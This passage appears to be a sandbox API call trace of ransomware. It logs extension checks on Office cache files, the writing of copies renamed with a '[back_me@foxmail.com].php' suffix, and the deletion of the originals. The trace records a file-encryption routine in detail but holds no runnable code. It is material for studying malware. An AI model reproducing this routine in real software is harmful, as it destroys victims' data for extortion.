dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.280] SetEndOfFile (hFile=0x1a4) returned 1 [0035.280] CloseHandle (hObject=0x1a4) returned 1 [0035.280] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0035.281] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml")) returned 1 [0035.281] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.281] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.281] lstrlenW (lpString=".doc") returned 4 [0035.281] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.281] lstrlenW (lpString=".docx") returned 5 [0035.281] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.281] lstrlenW (lpString=".pdf") returned 4 [0035.281] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.281] lstrlenW (lpString=".xls") returned 4 [0035.281] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.281] lstrlenW (lpString=".xlsx") returned 5 [0035.281] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.281] lstrlenW (lpString=".ppt") returned 4 [0035.281] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.281] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.281] lstrlenW (lpString=".zip") returned 4 [0035.281] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.281] lstrlenW (lpString=".rar") returned 4 [0035.281] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.281] lstrlenW (lpString=".bz2") returned 4 [0035.281] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.281] lstrlenW (lpString=".7z") returned 3 [0035.281] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.282] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.282] lstrlenW (lpString=".dbf") returned 4 [0035.282] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.282] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.282] lstrlenW (lpString=".1cd") returned 4 [0035.282] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.282] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.282] lstrlenW (lpString=".jpg") returned 4 [0035.282] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.282] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.282] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.282] lstrlenW (lpString=".doc") returned 4 [0035.282] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.282] lstrlenW (lpString=".docx") returned 5 [0035.282] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.282] lstrlenW (lpString=".pdf") returned 4 [0035.282] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.282] lstrlenW (lpString=".xls") returned 4 [0035.282] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.282] lstrlenW (lpString=".xlsx") returned 5 [0035.282] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.282] lstrlenW (lpString=".ppt") returned 4 [0035.282] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.282] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.282] lstrlenW (lpString=".zip") returned 4 [0035.282] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.282] lstrlenW (lpString=".rar") returned 4 [0035.282] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.282] lstrlenW (lpString=".bz2") returned 4 [0035.282] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.282] lstrlenW (lpString=".7z") returned 3 [0035.282] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.283] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.283] lstrlenW (lpString=".dbf") returned 4 [0035.283] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.283] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.283] lstrlenW (lpString=".1cd") returned 4 [0035.283] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.283] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.283] lstrlenW (lpString=".jpg") returned 4 [0035.283] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.283] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0035.283] lstrlenW (lpString="Setup.xml") returned 9 [0035.283] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.452] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1988) returned 1 [0035.453] CloseHandle (hObject=0x1a0) returned 1 [0035.453] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.453] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.453] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.453] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.453] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.453] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.453] GetLastError () returned 0x0 [0035.453] ReadFile (in: hFile=0x1a0, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x7c4, lpOverlapped=0x0) returned 1 [0035.455] WriteFile (in: hFile=0x190, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x7d0, lpOverlapped=0x0) returned 1 [0035.455] ReadFile (in: hFile=0x1a0, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.456] WriteFile (in: hFile=0x190, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.456] SetEndOfFile (hFile=0x190) returned 1 [0035.456] CloseHandle (hObject=0x190) returned 1 [0035.456] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.456] SetEndOfFile (hFile=0x1a0) returned 1 [0035.457] CloseHandle (hObject=0x1a0) returned 1 [0035.457] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0035.457] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.457] lstrlenW (lpString=".doc") returned 4 [0035.458] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.458] lstrlenW (lpString=".docx") returned 5 [0035.458] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.458] lstrlenW (lpString=".pdf") returned 4 [0035.458] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.458] lstrlenW (lpString=".xls") returned 4 [0035.458] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.458] lstrlenW (lpString=".xlsx") returned 5 [0035.458] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.458] lstrlenW (lpString=".ppt") returned 4 [0035.458] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.458] lstrlenW (lpString=".zip") returned 4 [0035.458] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.458] lstrlenW (lpString=".rar") returned 4 [0035.458] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.458] lstrlenW (lpString=".bz2") returned 4 [0035.458] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.458] lstrlenW (lpString=".7z") returned 3 [0035.458] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.458] lstrlenW (lpString=".dbf") returned 4 [0035.458] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.458] lstrlenW (lpString=".1cd") returned 4 [0035.458] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.458] lstrlenW (lpString=".jpg") returned 4 [0035.458] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.458] lstrlenW (lpString=".doc") returned 4 [0035.458] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.458] lstrlenW (lpString=".docx") returned 5 [0035.459] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.459] lstrlenW (lpString=".pdf") returned 4 [0035.459] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.459] lstrlenW (lpString=".xls") returned 4 [0035.459] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.459] lstrlenW (lpString=".xlsx") returned 5 [0035.459] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.459] lstrlenW (lpString=".ppt") returned 4 [0035.459] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.459] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.459] lstrlenW (lpString=".zip") returned 4 [0035.459] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.459] lstrlenW (lpString=".rar") returned 4 [0035.459] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.459] lstrlenW (lpString=".bz2") returned 4 [0035.459] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.459] lstrlenW (lpString=".7z") returned 3 [0035.459] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.459] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.459] lstrlenW (lpString=".dbf") returned 4 [0035.459] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.459] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.459] lstrlenW (lpString=".1cd") returned 4 [0035.459] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.459] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.459] lstrlenW (lpString=".jpg") returned 4 [0035.459] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.459] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0035.459] lstrlenW (lpString="OfficeMUISet.xml") returned 16 [0035.460] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0036.475] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=819) returned 1 [0036.475] CloseHandle (hObject=0x1bc) returned 1 [0036.475] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml")) returned 0x2020 [0036.475] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0036.475] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0036.475] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.475] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.475] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0036.476] GetLastError () returned 0x0 [0036.476] ReadFile (in: hFile=0x1bc, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x333, lpOverlapped=0x0) returned 1 [0036.634] WriteFile (in: hFile=0x1e4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x340, lpOverlapped=0x0) returned 1 [0036.635] ReadFile (in: hFile=0x1bc, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.635] WriteFile (in: hFile=0x1e4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0036.635] SetEndOfFile (hFile=0x1e4) returned 1 [0036.635] CloseHandle (hObject=0x1e4) returned 1 [0036.636] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.636] SetEndOfFile (hFile=0x1bc) returned 1 [0036.637] CloseHandle (hObject=0x1bc) returned 1 [0036.637] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0036.637] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml")) returned 1 [0036.637] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.637] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.637] lstrlenW (lpString=".doc") returned 4 [0036.637] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.637] lstrlenW (lpString=".docx") returned 5 [0036.637] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0036.637] lstrlenW (lpString=".pdf") returned 4 [0036.637] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.638] lstrlenW (lpString=".xls") returned 4 [0036.638] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.638] lstrlenW (lpString=".xlsx") returned 5 [0036.638] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0036.638] lstrlenW (lpString=".ppt") returned 4 [0036.638] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.638] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.638] lstrlenW (lpString=".zip") returned 4 [0036.638] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.638] lstrlenW (lpString=".rar") returned 4 [0036.638] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.638] lstrlenW (lpString=".bz2") returned 4 [0036.638] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.638] lstrlenW (lpString=".7z") returned 3 [0036.638] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.638] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.638] lstrlenW (lpString=".dbf") returned 4 [0036.638] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.638] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.638] lstrlenW (lpString=".1cd") returned 4 [0036.638] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.638] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.638] lstrlenW (lpString=".jpg") returned 4 [0036.638] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.638] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.638] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.638] lstrlenW (lpString=".doc") returned 4 [0036.638] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.638] lstrlenW (lpString=".docx") returned 5 [0036.638] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0036.638] lstrlenW (lpString=".pdf") returned 4 [0036.638] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.638] lstrlenW (lpString=".xls") returned 4 [0036.639] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.639] lstrlenW (lpString=".xlsx") returned 5 [0036.639] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0036.639] lstrlenW (lpString=".ppt") returned 4 [0036.639] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.639] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.639] lstrlenW (lpString=".zip") returned 4 [0036.639] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.639] lstrlenW (lpString=".rar") returned 4 [0036.639] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.639] lstrlenW (lpString=".bz2") returned 4 [0036.639] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.639] lstrlenW (lpString=".7z") returned 3 [0036.639] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.639] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.639] lstrlenW (lpString=".dbf") returned 4 [0036.639] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.639] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.639] lstrlenW (lpString=".1cd") returned 4 [0036.639] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.639] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.639] lstrlenW (lpString=".jpg") returned 4 [0036.639] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.639] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0036.639] lstrlenW (lpString="branding.xml") returned 12 [0036.639] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0036.987] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=596341) returned 1 [0036.987] CloseHandle (hObject=0x1b0) returned 1 [0036.987] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml")) returned 0x2020 [0036.987] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0036.987] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0036.987] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.988] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.988] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0037.629] GetLastError () returned 0x0 [0037.629] ReadFile (in: hFile=0x1b0, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x91975, lpOverlapped=0x0) returned 1 [0037.652] WriteFile (in: hFile=0x1e8, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x91980, lpOverlapped=0x0) returned 1 [0037.670] ReadFile (in: hFile=0x1b0, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 